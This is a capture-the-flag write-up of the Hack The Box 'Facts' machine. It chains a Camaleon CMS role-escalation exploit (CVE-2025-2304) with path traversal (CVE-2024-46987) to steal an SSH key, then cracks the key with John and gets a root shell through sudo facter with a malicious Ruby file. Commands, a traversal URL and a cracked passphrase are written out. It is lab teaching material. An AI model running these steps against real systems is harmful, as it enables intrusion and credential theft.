HTB-Season-10-Facts
Overview
Facts is an easy-difficulty Linux machine centred around a CMS called Camaleon. The attack chain begins with account registration and privilege escalation within the CMS itself using a known CVE, followed by chaining two separate path traversal vulnerabilities — one to read /etc/passwd and another to steal an encrypted SSH private key. After cracking the key with John the Ripper, SSH access is obtained as trivia. Privilege escalation to root abuses facter's --custom-dir option, which executes arbitrary Ruby code as root via a sudo misconfiguration.
Reconnaissance
Port Scan
nmap -Pn -p- -O 10.129.3.242 --min-rate=1000
Three open ports are identified:
| Port | Service |
|---|---|
| 22 | SSH |
| 80 | HTTP |
| 54321 | Unknown |
A quick curl -I reveals a 302 Moved Temporarily redirect to http://facts.htb/, indicating virtual host routing. Adding facts.htb to /etc/hosts is required to proceed.
Web Enumeration
Directory Fuzzing
ffuf -u http://facts.htb/FUZZ -w /usr/share/wordlists/seclists/Fuzzing/fuzz-Bo0oM.txt -fs 18 -t 20
The fuzzer returns multiple /admin paths all responding with 302 redirects — confirming the presence of an admin panel. Following the redirect with curl -I -L http://facts.htb/admin reveals the application is running Camaleon CMS version 2.9.0, identifiable from the asset paths in the response headers:
link: </assets/camaleon_cms/admin/admin-basic-manifest-...css>
Foothold
CMS Account Registration & Privilege Escalation — CVE-2025-2304
Navigating to http://facts.htb/admin presents a Camaleon CMS login page with a "Create an account" option. A new account is registered with credentials rehman:rehman.
Camaleon CMS version 2.9.0 is vulnerable to CVE-2025-2304 — a privilege escalation flaw that allows a low-privileged authenticated user to escalate their role to Administrator by manipulating the password change request.
Repo : https://github.com/predyy/CVE-2025-2304
A public exploit is used to automate the escalation:
python3 exp.py http://facts.htb rehman rehman
[*] Logging in as rehman ...
[+] Login successful
[+] Got profile page
[i] Version detected: 2.9.0 (< 2.9.1) - appears to be vulnerable version
[+] authenticity_token: vtQTxnUZ43dRkKMyzstX0GT3DLt-3K_2CR_5y_1E13MgagzV...
[+] Submit successful, you should be admin
Refreshing the profile page confirms the role has been updated from Client to Administrator, granting access to the full CMS dashboard including Contents, Media, Plugins, Users, Appearance, and Settings.
Path Traversal — CVE-2024-46987 (Reading /etc/passwd)
With administrator access, a known Camaleon CMS path traversal vulnerability is leveraged. CVE-2024-46987 allows an authenticated user to download arbitrary files from the server by manipulating the file parameter:
http://facts.htb/admin/media/download_private_file?file=../../../../../../etc/passwd
Repo : https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c
The downloaded passwd file reveals three users of interest:
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false
_laurel is restricted from shell access and can be ignored. The focus shifts to trivia and william, and since port 22 is open, obtaining their SSH keys becomes the next objective.
SSH Key Exfiltration — CVE-2024-46987
Using the same path traversal CVE with a separate public exploit, SSH key files are enumerated using default ssh-keygen filenames:
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_rsa
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_ecdsa
python3 CVE-2024-46987.py -u http://facts.htb/ -l rehman -p rehman /home/trivia/.ssh/id_ed25519
The id_rsa key for trivia is successfully retrieved — and it is passphrase-protected.
Cracking the SSH Key
The encrypted key is converted to a crackable hash using ssh2john, then cracked with rockyou.txt:
python3 /usr/share/john/ssh2john.py id_rsa_encrypted > ssh_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt
John cracks the passphrase in under 2 minutes:
grecia..school1
SSH access is obtained as trivia:
ssh -i id_rsa_encrypted trivia@facts.htb
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)
trivia@facts:~$
User Flag
Navigating the home directory reveals a second user, william. Moving to their home directory:
cd /home/william
cat user.txt
The user flag is retrieved.
Privilege Escalation — Facter Custom Directory
Sudo Enumeration
sudo -l
User trivia may run the following commands on facts:
(ALL) NOPASSWD: /usr/bin/facter
trivia can run /usr/bin/facter as root without a password. Checking the help output reveals a critical flag:
facter --help | grep -i "custom-dir"
[--custom-dir] A directory to use for custom facts.
Exploitation
facter loads Ruby .rb files from a custom directory and executes them. A malicious Ruby file is crafted that spawns a root bash shell:
mkdir -p /tmp/htb
cat > /tmp/htb/exploit.rb << 'EOF'
# This executes as soon as Facter loads the file
exec("/bin/bash -i")
EOF
The sudo command is triggered with the custom directory:
sudo /usr/bin/facter --custom-dir /tmp/htb
A root shell is returned immediately.
Root Flag
root@facts:~# cat root.txt
[REDACTED]
Attack Chain Summary
[Recon] nmap → ports 22, 80, 54321
↓
[Web] facts.htb → Camaleon CMS 2.9.0
↓
[CMS] Register account → CVE-2025-2304 → Role escalation to Administrator
↓
[File Read] CVE-2024-46987 path traversal → /etc/passwd → users: trivia, william
↓
[SSH Key] CVE-2024-46987 → /home/trivia/.ssh/id_rsa (encrypted)
↓
[Crack] ssh2john + john + rockyou.txt → passphrase: grecia..school1
↓
[Shell] SSH as trivia → user flag in /home/william
↓
[PrivEsc] sudo facter --custom-dir → malicious .rb → root shell
↓
[Root] cat root.txt
Key Takeaways
- CVE chaining — Two separate Camaleon CMS CVEs were chained together: privilege escalation within the CMS first, then file read as an authenticated admin.
- SSH key enumeration — When you have arbitrary file read, always try default SSH key names (
id_rsa,id_ecdsa,id_ed25519) for every user with shell access. - Facter
--custom-dir— Any tool that loads and executes code from a user-specified directory, when run via sudo, is a straightforward privesc vector. Always audit what NOPASSWD binaries actually do under the hood. - CMS version fingerprinting — Response headers and asset paths often leak the exact CMS version, making CVE lookup trivial.
Return1. Home